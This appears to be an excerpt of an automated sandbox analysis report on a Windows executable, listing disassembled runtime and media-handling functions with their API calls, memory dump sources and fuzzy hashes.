                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Window$DragLong$DrawFileFinishIconicImageList_QueryShow
                  • String ID:
                  • API String ID: 2049648798-0
                  • Opcode ID: 6023d4507c4139e6af8eb10c6cf1251b91f9cf243ebfbeed3750deca93c6df45
                  • Instruction ID: b517fde32568320c05455f0ef77fff5bda40acc178aeb8181a89edc0f1d8ba1d
                  • Opcode Fuzzy Hash: 6023d4507c4139e6af8eb10c6cf1251b91f9cf243ebfbeed3750deca93c6df45
                  • Instruction Fuzzy Hash: F951C331900A2BBBDB349F25FC68BA63BA7EB05351F444219F5869A5A0CB30DCC2DF50
                  Function 00635276 Relevance: 12.1, APIs: 8, Instructions: 56COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • InterlockedDecrement.KERNEL32(?), ref: 00635289
                  • InterlockedDecrement.KERNEL32(00000000), ref: 00635294
                  • InterlockedDecrement.KERNEL32(?), ref: 006352A1
                  • InterlockedDecrement.KERNEL32(?), ref: 006352AC
                  • InterlockedDecrement.KERNEL32(?), ref: 006352B9
                  • InterlockedDecrement.KERNEL32(00000000), ref: 006352D1
                  • InterlockedDecrement.KERNEL32(?), ref: 006352E2
                  • InterlockedDecrement.KERNEL32(?), ref: 006352F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: DecrementInterlocked
                  • String ID:
                  • API String ID: 3448037634-0
                  • Opcode ID: 3f09869f5905e71e42048157fbb13161e682da710ec0e12f4f6902d4133ab2cd
                  • Instruction ID: c6ab3a3c92ba30fb715d2f10c28340aa91c22b3f94f7c76cabf7b85ca58ea209
                  • Opcode Fuzzy Hash: 3f09869f5905e71e42048157fbb13161e682da710ec0e12f4f6902d4133ab2cd
                  • Instruction Fuzzy Hash: E3116130500B04DBDB326B29DC88BABF7EAEF80345F154469E15297260CB75A985CFA0
                  Function 006350A6 Relevance: 12.1, APIs: 8, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • InterlockedIncrement.KERNEL32(?), ref: 006350B5
                  • InterlockedIncrement.KERNEL32(00000000), ref: 006350C0
                  • InterlockedIncrement.KERNEL32(?), ref: 006350CD
                  • InterlockedIncrement.KERNEL32(00000000), ref: 006350D8
                  • InterlockedIncrement.KERNEL32(?), ref: 006350E5
                  • InterlockedIncrement.KERNEL32(?), ref: 006350FD
                  • InterlockedIncrement.KERNEL32(00000000), ref: 0063510E
                  • InterlockedIncrement.KERNEL32(?), ref: 00635122
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: IncrementInterlocked
                  • String ID:
                  • API String ID: 3508698243-0
                  • Opcode ID: 1e3e61e87cca1396719a24e0550778ce5e158a370e149a881e0c373f9f80c45f
                  • Instruction ID: 9b41d81e648ca238adf532f834c621761e6442a99650761365ec66af0a461047
                  • Opcode Fuzzy Hash: 1e3e61e87cca1396719a24e0550778ce5e158a370e149a881e0c373f9f80c45f
                  • Instruction Fuzzy Hash: 9B017931900E19EBDB269B29CC88B95FBEAFF05301F148066E01197560C776AC54DFE1
                  Function 00630D68 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 219COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __getptd_noexit
                  • String ID: s+b
                  • API String ID: 3074181302-2084237830
                  • Opcode ID: 731e49472bad6b5b6a47a69a1a0e2146923b21f651c3c0a9b0103cf9d19e3524
                  • Instruction ID: 8f1e4053fddbc38d8a8f9301d5d0d585a1cadda4df67f36c163355fd8c1f8078
                  • Opcode Fuzzy Hash: 731e49472bad6b5b6a47a69a1a0e2146923b21f651c3c0a9b0103cf9d19e3524
                  • Instruction Fuzzy Hash: 2251EFB2A04B14AFE324AA698C52B97B6EBEF84720F144A2DF155DB2D0E674E80446D4
                  Function 00635B93 Relevance: 10.7, APIs: 7, Instructions: 206COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00635DC6,?,?,?), ref: 00635BF9
                  • __alloca_probe_16.LIBCMT ref: 00635C37
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,00635DC6,?,?,?,?,?,?), ref: 00635C79
                  • __alloca_probe_16.LIBCMT ref: 00635D05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00635D68
                  • __freea.LIBCMT ref: 00635D71
                    • Part of subcall function 0063089A: __FF_MSGBANNER.LIBCMT ref: 006308B8
                    • Part of subcall function 0063089A: HeapAlloc.KERNEL32(011F0000,00000000,00000001,00000000,?,00000000,00000000,00632F0A,?,00000000,00000000,?,00000000,0063AB79,00000018,0064CAE0), ref: 006308D9
                  • __freea.LIBCMT ref: 00635D78
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeap
                  • String ID:
                  • API String ID: 1244195299-0
                  • Opcode ID: 86786eef0532354e90b4ae54baca013c9eba8f2e1072ede1a135507bf5f55b35
                  • Instruction ID: d6ff6102618a62d6a72b813fdb212aeaecc27e578f9ee0bfa6a7c5755dbea955
                  • Opcode Fuzzy Hash: 86786eef0532354e90b4ae54baca013c9eba8f2e1072ede1a135507bf5f55b35
                  • Instruction Fuzzy Hash: 2D519C72600A1AABEF249F54DC89EBA36ABEF45364F180569FD06E7250D730DC008BE4
                  Function 00630FB9 Relevance: 9.3, APIs: 6, Instructions: 287COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00635057: __getptd_noexit.LIBCMT ref: 00635057
                    • Part of subcall function 0063841E: __lock.LIBCMT ref: 00638435
                  • __allrem.LIBCMT ref: 00631150
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0063116C
                  • __allrem.LIBCMT ref: 00631184
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006311A1
                  • __allrem.LIBCMT ref: 006311B7
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006311D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3664976373-0
                  • Opcode ID: 54b324d46669c2e7952030e7a97bdbbdf6d938ceff45db136138f57f7902f3e1
                  • Instruction ID: 6251fc8db8fa44e5a6da8a6f242dc026653c8627ea40c9e36151bb43f10d2998
                  • Opcode Fuzzy Hash: 54b324d46669c2e7952030e7a97bdbbdf6d938ceff45db136138f57f7902f3e1
                  • Instruction Fuzzy Hash: A99116725047168BD714AF28CC42A9B77EAAF86760F05492EF954CF382EF30D8458BD6
                  Function 00633A6D Relevance: 9.2, APIs: 6, Instructions: 228COMMON
                  Download Yara Rule
                  APIs
                  • __lock.LIBCMT ref: 00633A7B
                    • Part of subcall function 0063AAAF: __mtinitlocknum.LIBCMT ref: 0063AAC1
                    • Part of subcall function 0063AAAF: EnterCriticalSection.KERNEL32(?,?,0063395B,0000000D), ref: 0063AADA
                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00633AA7
                  • GetStartupInfoW.KERNEL32(?,0064C798,00000064,0062F518,0064C5D8,00000010), ref: 00633B00
                  • GetFileType.KERNEL32(?), ref: 00633BD9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 673813358-0
                  • Opcode ID: 19a90f8cd5c0f347b51b6d5e3d02ccb350b0c786ad86d130942731b8279db2dd
                  • Instruction ID: 0c154a6a5b95277e930e457294a2b03d810218138f5d8732335a0a7a4be5946a
                  • Opcode Fuzzy Hash: 19a90f8cd5c0f347b51b6d5e3d02ccb350b0c786ad86d130942731b8279db2dd
                  • Instruction Fuzzy Hash: E591F4709043668FDB14CF68C8516ADBBF2BF46320F24626ED0A6AB3D1D7359903CB94
                  Function 0063C49B Relevance: 9.1, APIs: 6, Instructions: 121COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __mtinitlocknum.LIBCMT ref: 0063C4B5
                    • Part of subcall function 0063AB37: __FF_MSGBANNER.LIBCMT ref: 0063AB4C
                  • __lock.LIBCMT ref: 0063C4C8
                  • __lock.LIBCMT ref: 0063C514
                  • EnterCriticalSection.KERNEL32(0000000C,0064CB60,00000018,0063D163,?,00000000,s+b,?,?,?,?,?,?,?,00000109), ref: 0063C551
                  • LeaveCriticalSection.KERNEL32(0000000C,?,?,?,?,?,?,?,00000109), ref: 0063C561
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CriticalSection__lock$EnterLeave__mtinitlocknum
                  • String ID:
                  • API String ID: 3647371838-0
                  • Opcode ID: 2cd44c9dfef11da497d7937756e954ae71d6ed92288a02ff57b6d3ba472d2d37
                  • Instruction ID: dbe88be652bc1cc733c7db37040e7030205f96230a338a5b971ce083e1437e98
                  • Opcode Fuzzy Hash: 2cd44c9dfef11da497d7937756e954ae71d6ed92288a02ff57b6d3ba472d2d37
                  • Instruction Fuzzy Hash: 2E41E271A007069BEB10DF68D8557A8B7A2AF41735F20921CF425BB2D2D774E951CBC8
                  Function 0063BFFF Relevance: 9.1, APIs: 6, Instructions: 99COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,00000100,?,00000000,?,?,0063C120,?,?,?,?), ref: 0063C03C
                  • __alloca_probe_16.LIBCMT ref: 0063C071
                  • _memset.LIBCMT ref: 0063C0A8
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?), ref: 0063C0BD
                  • GetStringTypeW.KERNEL32(00000000,00000000,00000000,?), ref: 0063C0CF
                  • __freea.LIBCMT ref: 0063C0D8
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$StringType__alloca_probe_16__freea_memset
                  • String ID:
                  • API String ID: 2644217261-0
                  • Opcode ID: b276b78fadf057670e553f7c6b8b28bda86d1803f1cc45ae7f96399056da9525
                  • Instruction ID: d89194e3476ab947977e50bd111e8701932d7531ffb1b2e3ad78763fc0718ad7
                  • Opcode Fuzzy Hash: b276b78fadf057670e553f7c6b8b28bda86d1803f1cc45ae7f96399056da9525
                  • Instruction Fuzzy Hash: 37318F3290025AEFDB249F64EC80EAF3BAAEF45760F140529FC09E6251D732CC119BD0
                  Function 00621BB8 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 61stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcpyW.KERNEL32(?,?), ref: 00621BE3
                  • lstrcpyW.KERNEL32(-00000002,0064AC74), ref: 00621C1C
                  • lstrcpyW.KERNEL32(?,?), ref: 00621C4B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: lstrcpy
                  • String ID: BDAV$BDMV$VIDEO_TS
                  • API String ID: 3722407311-1491862410
                  • Opcode ID: 9d8b58834755aff9c9e0e77055dd28c4ec3cfff20fe920f9c3c0947d89b70416
                  • Instruction ID: 126680c583d7be55ceb35f3d02c4a7d9fca8aa80ddd7513f7d5ae28292d57989
                  • Opcode Fuzzy Hash: 9d8b58834755aff9c9e0e77055dd28c4ec3cfff20fe920f9c3c0947d89b70416
                  • Instruction Fuzzy Hash: 821106761487559FC324EFA4EC8586BB7EAEF85700F10082EF544C3200EB35D9088B97
                  Function 00637FE4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 214COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __sopen_s
                  • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                  • API String ID: 2693426323-3573488595
                  • Opcode ID: 43dfe4bbe62496ab2783c730512f05967f65921a9a57bcb18472a28fe0c8f9b5
                  • Instruction ID: 8963ee27fcd4082779520560f888959078009a41ac0128f1117fd0b198cc95ab
                  • Opcode Fuzzy Hash: 43dfe4bbe62496ab2783c730512f05967f65921a9a57bcb18472a28fe0c8f9b5
                  • Instruction Fuzzy Hash: F85137B2D083038EE7384E6589467F276A7EBA0358F29052DFD8593381EFA5CD4792D1
                  Function 006354E2 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00635508
                  • ___crtGetStringTypeA.LIBCMT ref: 0063556C
                  • ___crtLCMapStringA.LIBCMT ref: 0063558C
                  • ___crtLCMapStringA.LIBCMT ref: 006355B3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: String___crt$InfoType
                  • String ID:
                  • API String ID: 2559498669-3916222277
                  • Opcode ID: e19c6add1e7f70186f867b2c55533ff19cf854ea55c430b0537b18180e41ea73
                  • Instruction ID: a4f112c09f19ae33c36171bc378617feeb9ea61168b2a242142b2221464d37c0
                  • Opcode Fuzzy Hash: e19c6add1e7f70186f867b2c55533ff19cf854ea55c430b0537b18180e41ea73
                  • Instruction Fuzzy Hash: 8D412671108B849ED7268B24CC45EFBBBEFAF8A308F58086DE4C787152D221E5059BA1
                  Function 00621E9A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42windowCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfW.USER32 ref: 00621EC6
                  • SetDlgItemTextW.USER32(00000000,00000012,?), ref: 00621ED6
                  • GetDlgItem.USER32(00000000,00000011), ref: 00621EDF
                  • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00621EEE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$MessageSendTextwsprintf
                  • String ID: %d%%
                  • API String ID: 1723200183-1518462796
                  • Opcode ID: a8056dc18ba834220a3ed23bf4a565738d432e874d04dfbc4a9bcfc5c126ea6d
                  • Instruction ID: bb5bca90aed02ae43067bc2efde233bdaf82796e23b7334f5663181011b4b711
                  • Opcode Fuzzy Hash: a8056dc18ba834220a3ed23bf4a565738d432e874d04dfbc4a9bcfc5c126ea6d
                  • Instruction Fuzzy Hash: 14F02875A40318BBCB10DBA4AC49EBF777DEF46710F500019F901E7280DAB05F018791
                  Function 00629E34 Relevance: 8.0, APIs: 5, Instructions: 489COMMON
                  Download Yara Rule
                  APIs
                  • wsprintfW.USER32 ref: 00629EC4
                    • Part of subcall function 00625FD3: GetProcessHeap.KERNEL32(00000000,?,00629F1C,00000000,00000000), ref: 00625FD9
                    • Part of subcall function 00625FD3: HeapFree.KERNEL32(00000000), ref: 00625FE0
                  • wsprintfW.USER32 ref: 00629F6B
                    • Part of subcall function 006410FF: FindFirstFileW.KERNEL32(?,?,00000001,00000000,?), ref: 00641197
                  • wsprintfW.USER32 ref: 0062A035
                  • wsprintfW.USER32 ref: 0062A288
                  • wsprintfW.USER32 ref: 0062A3DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: wsprintf$Heap$FileFindFirstFreeProcess
                  • String ID:
                  • API String ID: 1327367631-0
                  • Opcode ID: 93ff32b90e4580ea972140599c26400cbc6c403398e3452cab44943d4e044193
                  • Instruction ID: 871c31c847803e75244dbb4a99ce31ba0614aed38d6d5f0ffff9d0d06b40d770
                  • Opcode Fuzzy Hash: 93ff32b90e4580ea972140599c26400cbc6c403398e3452cab44943d4e044193
                  • Instruction Fuzzy Hash: 7412DA715087919BC760EFA4E885BDFB7EAAF89300F00091DF58997241EB75A948CF63
                  Function 006358B5 Relevance: 7.7, APIs: 5, Instructions: 161COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • getSystemCP.LIBCMT ref: 006358CD
                    • Part of subcall function 0063541A: GetOEMCP.KERNEL32(00000000), ref: 00635443
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00000000), ref: 00635922
                  • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000), ref: 00635936
                  • _memset.LIBCMT ref: 0063594E
                    • Part of subcall function 00635488: _memset.LIBCMT ref: 0063549D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset$CodeInfoPageSystemValid
                  • String ID:
                  • API String ID: 1927818438-0
                  • Opcode ID: 9e2926cf4c8d80c7321a6f10eefea1e5c05535348f7bb14d7f988dcee35649b7
                  • Instruction ID: ab7f878965ae8adc7529a82aa1ca9fc82631cc9c325c7aecde2ae06f3c5b3cb7
                  • Opcode Fuzzy Hash: 9e2926cf4c8d80c7321a6f10eefea1e5c05535348f7bb14d7f988dcee35649b7
                  • Instruction Fuzzy Hash: F4514671504BC19FD725DF20C8807BABBE7AF41314F24496EE0878B292E6319985DBD2
                  Function 00634396 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32(?,0062F534), ref: 00634397
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,0062F534), ref: 006343CC
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,0062F534), ref: 006343EF
                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0062F534), ref: 00634403
                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0062F534), ref: 0063440E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                  • String ID:
                  • API String ID: 1823725401-0
                  • Opcode ID: 9a525cfd990c69d3af7892c0fee5cbcca248a4b681d9df15923251556bf964e3
                  • Instruction ID: 2d165e6910030b873c1b54e3d611c0ef8e09d6494458f98dcf7cf3c6ff105c59
                  • Opcode Fuzzy Hash: 9a525cfd990c69d3af7892c0fee5cbcca248a4b681d9df15923251556bf964e3
                  • Instruction Fuzzy Hash: 6F01D4A65002577FA7301BB56C5CD77AAEFDA92658716443AFE05C3201EE609C0181F0
                  Function 006339C5 Relevance: 7.5, APIs: 5, Instructions: 45threadCOMMON
                  Download Yara Rule
                  APIs
                  • __init_pointers.LIBCMT ref: 006339C5
                    • Part of subcall function 00632C9C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006332F2
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00633306
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00633319
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0063332C
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0063333F
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00633352
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00633365
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00633378
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0063338B
                    • Part of subcall function 00632C9C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0063339E
